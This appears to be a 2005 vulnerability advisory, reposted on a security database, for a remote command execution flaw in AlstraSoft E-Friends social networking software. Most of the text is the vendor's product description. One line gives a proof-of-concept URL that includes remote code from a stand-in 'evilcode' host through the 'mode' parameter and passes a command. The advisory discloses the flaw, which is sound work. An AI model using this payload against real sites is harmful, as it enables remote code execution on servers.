AlstraSoft E-Friends Remote Command Exucetion

2005.09.24
Credit: khc
Risk: High
Local: No
Remote: Yes
CWE: N/A


CVSS Base Score: 7.5/10
Impact Subscore: 6.4/10
Exploitability Subscore: 10/10
Exploit range: Remote
Attack complexity: Low
Authentication: No required
Confidentiality impact: Partial
Integrity impact: Partial
Availability impact: Partial

AlstraSoft E-Friends Remote command exucetion Site : http://www.alstrasoft.com/efriends.htm Description : AlstraSoft E-Friends is an online social networking software that allows you to start your own site just like Friendster and Tribe.net. The E-Friends software allows members to connect to people in their personal networks and community, creating a new online interactive resource that is based on a trusted network of friends and associates on the internet. Members can use this abundant network to make friends, find their love ones, locate jobs, buy and sell stuff, locate a roommate, and accomplish much more with the help of groups and individuals who they know and share the same interests. With our new 4.0 release, you can now start a profitable social networking business by creating custom membership packages using Paypal payment gateway. In addition, we have added several new exciting features including online blog, forums, text-based chat, events and many more! Enhancements are also added to the admin backend and with our integrated banner ads system, you can earn extra income by publishing paid banner ads on your E-Friends site. Vulnerable: http://www.ownz.net/index.php?mode=http://evilcode?&cmd= Solution : no :P Contact : khc (at) bsdmail (dot) org [email concealed] Kurdish Hackers Clan!


Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}

Copyright 2024, cxsecurity.com

 

Back to Top